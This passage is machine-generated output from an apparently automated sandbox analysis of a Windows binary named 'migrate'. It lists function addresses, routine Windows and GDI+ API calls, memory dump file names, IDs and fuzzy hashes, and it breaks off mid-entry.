                                                                                                                                                                                                    • Opcode Fuzzy Hash: c030b420006b7fb8cd711a3fcb7cdd046e7e86eb58b47ecc1591b8f626aaaa98
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADE0D83151025039D22552291C01FEB9AECDFBAB24F14803FF1EDD6181D7D064D682F5
                                                                                                                                                                                                    Function 0011A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0011A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6C4
                                                                                                                                                                                                      • Part of subcall function 0011A69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6F2
                                                                                                                                                                                                      • Part of subcall function 0011A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6FE
                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0011A598
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1464966427-0
                                                                                                                                                                                                    • Opcode ID: 1ecbd5b6d310a414eb263ab32f513a2704641d8274d069ef638b4f993872751f
                                                                                                                                                                                                    • Instruction ID: d05600f7124251ad8b39928bac209f76c8d792cddbbfe46bc821ca0a14d69054
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ecbd5b6d310a414eb263ab32f513a2704641d8274d069ef638b4f993872751f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDF0E23100E380AACB6657B48900BCB7F946F2A331F448B09F1FD1209AC37110D89B23
                                                                                                                                                                                                    Function 00120E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00120E3D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2211380416-0
                                                                                                                                                                                                    • Opcode ID: fd9c646ba499e1e408e340a28d7421a3f21245f81117d00d49c7e1d1196fb4d2
                                                                                                                                                                                                    • Instruction ID: 67fa665c4c5b8a0195eccb98f9b537c4e66471ca3f1c87071b57e48705d94060
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd9c646ba499e1e408e340a28d7421a3f21245f81117d00d49c7e1d1196fb4d2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1D0C2016050647ADA16732838157FE26268FEA312F0D0135F0455B5C3CB4508C6A2A1
                                                                                                                                                                                                    Function 0012A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0012A62C
                                                                                                                                                                                                      • Part of subcall function 0012A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0012A3DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1915507550-0
                                                                                                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                                    • Instruction ID: f8cdf88a1af1b64a8c01a248c4a76ed59f656a0b606c189f71d4255caf71388b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D0A930200218BBDF02AB21EC02A7E7AAAFF10340F408021B842C5181EBB1D930A262
                                                                                                                                                                                                    Function 0012E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DloadProtectSection.DELAYIMP ref: 0012E5E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DloadProtectSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2203082970-0
                                                                                                                                                                                                    • Opcode ID: b477cf3b86fbdfebb5e2143854480413c0712c87df9d0c2ee33cbd8b49b3541d
                                                                                                                                                                                                    • Instruction ID: c76d3702dd5e01f9aee05f8b0fd0518a656755d25913b4e0d5cf703164f0ca04
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b477cf3b86fbdfebb5e2143854480413c0712c87df9d0c2ee33cbd8b49b3541d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70D0C9B81902A0ABD706EBECB94671433E5B729704F944101B149918A5DB7844E49A15
                                                                                                                                                                                                    Function 0012DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00121B3E), ref: 0012DD92
                                                                                                                                                                                                      • Part of subcall function 0012B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012B579
                                                                                                                                                                                                      • Part of subcall function 0012B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B58A
                                                                                                                                                                                                      • Part of subcall function 0012B568: IsDialogMessageW.USER32(000801EA,?), ref: 0012B59E
                                                                                                                                                                                                      • Part of subcall function 0012B568: TranslateMessage.USER32(?), ref: 0012B5AC
                                                                                                                                                                                                      • Part of subcall function 0012B568: DispatchMessageW.USER32(?), ref: 0012B5B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 897784432-0
                                                                                                                                                                                                    • Opcode ID: ce29d9b22a4d3293b2df61aba2cfd2723671d8e88123f3e37445b8375c1c9f54
                                                                                                                                                                                                    • Instruction ID: bafd7475575243a7cb1f5f7805399cf5fb6a3fe39d87d5a3f7c6e328c5289ba2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce29d9b22a4d3293b2df61aba2cfd2723671d8e88123f3e37445b8375c1c9f54
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DD09E31148300FED6022B51DD06F0A7BA2AB98B05F404555B284744B18B72AD71EF11
                                                                                                                                                                                                    Function 0011F1E8 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                    • Opcode ID: 4cb99baf4053833733f4282e64b9b5e92ea22a9dc72458be9ad947564704ea8b
                                                                                                                                                                                                    • Instruction ID: b48e12305dcc46b962da51636329e9a0f7f0539e4bf19bdb031ce1359a98dc40
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cb99baf4053833733f4282e64b9b5e92ea22a9dc72458be9ad947564704ea8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FD0CA70410222CFD3A8CF29E804782BBE0AF18321B21883EA0E9C2620E77088C4CF40
                                                                                                                                                                                                    Function 001198BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileType.KERNELBASE(000000FF,001197BE), ref: 001198C8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileType
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                                                                                    • Opcode ID: 96a05969cf3a6219d5be829e2230bc1181ddfe9c1da64950c547675ff9444803
                                                                                                                                                                                                    • Instruction ID: ac71bf87d02130c69e4a760337a184b056001369cd832670a670bd90e7f0e3a5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96a05969cf3a6219d5be829e2230bc1181ddfe9c1da64950c547675ff9444803
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27C00238404249968E299A2498690DA7762AB533A67B497A4D07D8A4A1C322CCD7EA11
                                                                                                                                                                                                    Function 0012E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 2113e83615b4407a15121c861ce3d125fcfe44e25017a2b2a8575ea58a63f6ad
                                                                                                                                                                                                    • Instruction ID: 1a50c4c307797c55f7b360ef4116ad6df56d41e5211ffeaf87b69ad008f52f33
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2113e83615b4407a15121c861ce3d125fcfe44e25017a2b2a8575ea58a63f6ad
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4DB012D5359110FC310822453D12C3B026CC1C2B21331C43EFC55D4480EF40AC202871
                                                                                                                                                                                                    Function 0012E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 8b6c6678dc3a65d940c9b6231c3c19ae0fb12c60666672cceafd428174f037c1
                                                                                                                                                                                                    • Instruction ID: a8d3b76f58267461292da9d6e21464a2ee0f9a02e7ab3bfaaf9deaefb128ef52
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b6c6678dc3a65d940c9b6231c3c19ae0fb12c60666672cceafd428174f037c1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AB012D1359010AC314863053D02C3B02ACC1C2B21331C03EFC59C41C0EB40AC241871
                                                                                                                                                                                                    Function 0012E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: e74db325dd50388f68570c83e94afd38920c92d23571264f05655d86d1d956b0
                                                                                                                                                                                                    • Instruction ID: 8138be5c29914b39c2c893a06bdc65f8774fd759fe9ee9c7caac8c5a4f7fc3c8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e74db325dd50388f68570c83e94afd38920c92d23571264f05655d86d1d956b0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FB012D535D110EC314862493D02C3B03ACC1C1B21331C03EF819C4080EF406C202972
                                                                                                                                                                                                    Function 0012E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 231d3fcd70d7ee8e3c5f2eebb3979be294e3ab4102b77e215d0d9ae43078e66e
                                                                                                                                                                                                    • Instruction ID: e6c2d36a02ada7f2d0c128c44352553ea7d02a1b70bdcb5b518898d2b70dad9b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 231d3fcd70d7ee8e3c5f2eebb3979be294e3ab4102b77e215d0d9ae43078e66e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FB012E1359010BC314862053D02C3B02ACC1C2F21331C03EFC59C4080EB40AD201871
                                                                                                                                                                                                    Function 0012E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 0a3e1b03b32d6bdc865cbd068bac128555b56fcceab5195264bee533673c8f87
                                                                                                                                                                                                    • Instruction ID: fbd5c65042ca575be990cbdad725c5c788527908a00a13dfeae5e83130592e5d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a3e1b03b32d6bdc865cbd068bac128555b56fcceab5195264bee533673c8f87
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AB012D1359150BC318863053D02C3B02ACC1C1B21331C13EF819C45C0EB406C641871
                                                                                                                                                                                                    Function 0012E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
